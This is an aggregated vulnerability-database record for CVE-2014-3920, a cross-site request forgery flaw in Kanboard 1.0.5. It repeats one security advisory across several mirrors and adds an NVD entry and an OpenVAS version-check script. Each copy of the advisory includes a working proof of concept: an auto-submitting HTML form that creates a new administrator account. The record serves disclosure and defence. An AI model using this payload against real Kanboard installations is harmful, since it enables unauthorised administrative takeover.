ID PACKETSTORM:127332 Type packetstorm Reporter High-Tech Bridge SA Modified 2014-07-02T00:00:00
Description
`Advisory ID: HTB23217
Product: Kanboard
Vendor: http://kanboard.net/
Vulnerable Version(s): 1.0.5 and probably prior
Tested Version: 1.0.5
Advisory Publication: May 28, 2014 [without technical details]
Vendor Notification: May 28, 2014
Vendor Patch: June 30, 2014
Public Disclosure: July 2, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-3920
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.
1. Сross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920
The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges.
Simple CSRF exploit below creates new admin account with login "immuniweb" and password "password":
<form action="http://kanboard/?controller=user&action=save" method="post" name="main">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="name" value="name">
<input type="hidden" name="email" value="mail@mail.com">
<input type="hidden" name="password" value="password">
<input type="hidden" name="confirmation" value="password">
<input type="hidden" name="default_project_id" value="0">
<input type="hidden" name="is_admin" value="1">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Kanboard 1.0.6
More Information:
http://kanboard.net/news
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23217 - https://www.htbridge.com/advisory/HTB23217 - Сross-Site Request Forgery (CSRF) in Kanboard.
[2] Kanboard - kanboard.net - A simple and open source visual task board
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
`
{"id": "PACKETSTORM:127332", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Kanboard 1.0.5 Cross Site Request Forgery", "description": "", "published": "2014-07-02T00:00:00", "modified": "2014-07-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/127332/Kanboard-1.0.5-Cross-Site-Request-Forgery.html", "reporter": "High-Tech Bridge SA", "references": [], "cvelist": ["CVE-2014-3920"], "lastseen": "2016-12-05T22:20:37", "viewCount": 6, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2016-12-05T22:20:37", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3920"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310111063"]}, {"type": "zdt", "idList": ["1337DAY-ID-22408"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14025", "SECURITYVULNS:DOC:31245"]}, {"type": "htbridge", "idList": ["HTB23217"]}], "modified": "2016-12-05T22:20:37", "rev": 2}, "vulnersScore": 6.4}, "sourceHref": "https://packetstormsecurity.com/files/download/127332/kanboard-xsrf.txt", "sourceData": "`Advisory ID: HTB23217 \nProduct: Kanboard \nVendor: http://kanboard.net/ \nVulnerable Version(s): 1.0.5 and probably prior \nTested Version: 1.0.5 \nAdvisory Publication: May 28, 2014 [without technical details] \nVendor Notification: May 28, 2014 \nVendor Patch: June 30, 2014 \nPublic Disclosure: July 2, 2014 \nVulnerability Type: Cross-Site Request Forgery [CWE-352] \nCVE Reference: CVE-2014-3920 \nRisk Level: Medium \nCVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application. \n \n \n1. \u0421ross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920 \n \nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. \n \nSimple CSRF exploit below creates new admin account with login \"immuniweb\" and password \"password\": \n \n \n<form action=\"http://kanboard/?controller=user&action=save\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"username\" value=\"immuniweb\"> \n<input type=\"hidden\" name=\"name\" value=\"name\"> \n<input type=\"hidden\" name=\"email\" value=\"mail@mail.com\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"confirmation\" value=\"password\"> \n<input type=\"hidden\" name=\"default_project_id\" value=\"0\"> \n<input type=\"hidden\" name=\"is_admin\" value=\"1\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Kanboard 1.0.6 \n \nMore Information: \nhttp://kanboard.net/news \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23217 - https://www.htbridge.com/advisory/HTB23217 - \u0421ross-Site Request Forgery (CSRF) in Kanboard. \n[2] Kanboard - kanboard.net - A simple and open source visual task board \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:14:30", "description": "Cross-site request forgery (CSRF) vulnerability in Kanboard before 1.0.6 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a save action to the default URI.", "edition": 6, "cvss3": {}, "published": "2014-07-03T14:55:00", "title": "CVE-2014-3920", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3920"], "modified": "2018-10-09T19:47:00", "cpe": ["cpe:/a:kanboard:kanboard:1.0.1", "cpe:/a:kanboard:kanboard:1.0.5", "cpe:/a:kanboard:kanboard:1.0.6", "cpe:/a:kanboard:kanboard:1.0.0", "cpe:/a:kanboard:kanboard:1.0.3", "cpe:/a:kanboard:kanboard:1.0.2", "cpe:/a:kanboard:kanboard:1.0.4"], "id": "CVE-2014-3920", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3920", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:kanboard:kanboard:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:kanboard:kanboard:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:kanboard:kanboard:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:kanboard:kanboard:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:kanboard:kanboard:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:kanboard:kanboard:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:kanboard:kanboard:1.0.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:36:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3920"], "description": "Kanboard is prone to a cross-site request-forgery vulnerability\n because it does not properly validate HTTP requests.", "modified": "2019-03-14T00:00:00", "published": "2015-12-04T00:00:00", "id": "OPENVAS:1361412562310111063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310111063", "type": "openvas", "title": "Kanboard CVE-2014-3920 Cross Site Request Forgery Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: sw_kanboard_68340.nasl 14184 2019-03-14 13:29:04Z cfischer $\n#\n# Kanboard CVE-2014-3920 Cross Site Request Forgery Vulnerability\n#\n# Authors:\n# Christian Fischer <info@schutzwerk.com>\n#\n# Copyright:\n# Copyright (c) 2015 SCHUTZWERK GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:kanboard:kanboard';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.111063\");\n script_version(\"$Revision: 14184 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 14:29:04 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-04 13:00:00 +0100 (Fri, 04 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2014-3920\");\n script_bugtraq_id(68340);\n script_name(\"Kanboard CVE-2014-3920 Cross Site Request Forgery Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2015 SCHUTZWERK GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_kanboard_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"kanboard/installed\");\n\n script_tag(name:\"summary\", value:\"Kanboard is prone to a cross-site request-forgery vulnerability\n because it does not properly validate HTTP requests.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"impact\", value:\"Exploiting this issue may allow a remote attacker to perform\n certain unauthorized actions. This may lead to further attacks.\");\n script_tag(name:\"affected\", value:\"Kanboard versions below 1.0.6 are vulnerable.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates listened in the referred advisory.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/68340\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/532619/100/0/threaded\");\n script_xref(name:\"URL\", value:\"http://kanboard.net/news/version-1.0.6\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"1.0.6\" ) ) {\n\n report = 'Installed version: ' + vers + '\\n' +\n 'Fixed version: ' + \"1.0.6\" + '\\n';\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-01T09:09:10", "description": "Cross-site request forgery (CSRF) vulnerability in Kanboard before 1.0.6 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a save action to the default URI.", "edition": 2, "published": "2014-07-06T00:00:00", "type": "zdt", "title": "Kanboard 1.0.5 Cross Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3920"], "modified": "2014-07-06T00:00:00", "id": "1337DAY-ID-22408", "href": "https://0day.today/exploit/description/22408", "sourceData": "Product: Kanboard\r\nVendor: http://kanboard.net/\r\nVulnerable Version(s): 1.0.5 and probably prior\r\nTested Version: 1.0.5\r\nAdvisory Publication: May 28, 2014 [without technical details]\r\nVendor Notification: May 28, 2014 \r\nVendor Patch: June 30, 2014 \r\nPublic Disclosure: July 2, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-3920\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.\r\n\r\n\r\n1. \u0421ross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. \r\n\r\nSimple CSRF exploit below creates new admin account with login \"immuniweb\" and password \"password\":\r\n\r\n\r\n<form action=\"http://kanboard/?controller=user&action=save\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"username\" value=\"immuniweb\">\r\n<input type=\"hidden\" name=\"name\" value=\"name\">\r\n<input type=\"hidden\" name=\"email\" value=\"[email\u00a0protected]\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"confirmation\" value=\"password\">\r\n<input type=\"hidden\" name=\"default_project_id\" value=\"0\">\r\n<input type=\"hidden\" name=\"is_admin\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Kanboard 1.0.6\r\n\r\nMore Information:\r\nhttp://kanboard.net/news\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22408"}], "htbridge": [{"lastseen": "2020-12-24T11:21:00", "bulletinFamily": "software", "cvelist": ["CVE-2014-3920"], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application. \n \n \n1\\. \u0421ross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920 \n \nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. \n \nSimple CSRF exploit below creates new admin account with login \"immuniweb\" and password \"password\": \n \n<form action=\"http://kanboard/?controller=user&action=save\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"username\" value=\"immuniweb\"> \n<input type=\"hidden\" name=\"name\" value=\"name\"> \n<input type=\"hidden\" name=\"email\" value=\"mail@mail.com\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"confirmation\" value=\"password\"> \n<input type=\"hidden\" name=\"default_project_id\" value=\"0\"> \n<input type=\"hidden\" name=\"is_admin\" value=\"1\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.main.submit(); \n</script>\n", "modified": "2014-06-30T00:00:00", "published": "2014-05-28T00:00:00", "id": "HTB23217", "href": "https://www.htbridge.com/advisory/HTB23217", "type": "htbridge", "title": "Cross-Site Request Forgery (CSRF) in Kanboard", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-3920"], "description": "\r\n\r\nAdvisory ID: HTB23217\r\nProduct: Kanboard\r\nVendor: http://kanboard.net/\r\nVulnerable Version(s): 1.0.5 and probably prior\r\nTested Version: 1.0.5\r\nAdvisory Publication: May 28, 2014 [without technical details]\r\nVendor Notification: May 28, 2014 \r\nVendor Patch: June 30, 2014 \r\nPublic Disclosure: July 2, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-3920\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.\r\n\r\n\r\n1. \u0421ross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. \r\n\r\nSimple CSRF exploit below creates new admin account with login "immuniweb" and password "password":\r\n\r\n\r\n<form action="http://kanboard/?controller=user&action=save" method="post" name="main">\r\n<input type="hidden" name="username" value="immuniweb">\r\n<input type="hidden" name="name" value="name">\r\n<input type="hidden" name="email" value="mail@mail.com">\r\n<input type="hidden" name="password" value="password">\r\n<input type="hidden" name="confirmation" value="password">\r\n<input type="hidden" name="default_project_id" value="0">\r\n<input type="hidden" name="is_admin" value="1">\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Kanboard 1.0.6\r\n\r\nMore Information:\r\nhttp://kanboard.net/news\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23217 - https://www.htbridge.com/advisory/HTB23217 - \u0421ross-Site Request Forgery (CSRF) in Kanboard.\r\n[2] Kanboard - kanboard.net - A simple and open source visual task board\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:DOC:31245", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31245", "title": "Cross-Site Request Forgery (CSRF) in Kanboard", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-5129", "CVE-2014-5127", "CVE-2014-1546", "CVE-2014-0986", "CVE-2014-0991", "CVE-2014-4736", "CVE-2014-5393", "CVE-2014-5136", "CVE-2014-0485", "CVE-2014-3810", "CVE-2014-0987", "CVE-2014-0985", "CVE-2014-4172", "CVE-2014-0990", "CVE-2014-6308", "CVE-2014-5391", "CVE-2014-0988", "CVE-2014-0992", "CVE-2014-3737", "CVE-2014-0989", "CVE-2014-3119", "CVE-2014-5392", "CVE-2014-4914", "CVE-2014-4734", "CVE-2014-6280", "CVE-2014-4170", "CVE-2014-3920"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:VULN:14025", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14025", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}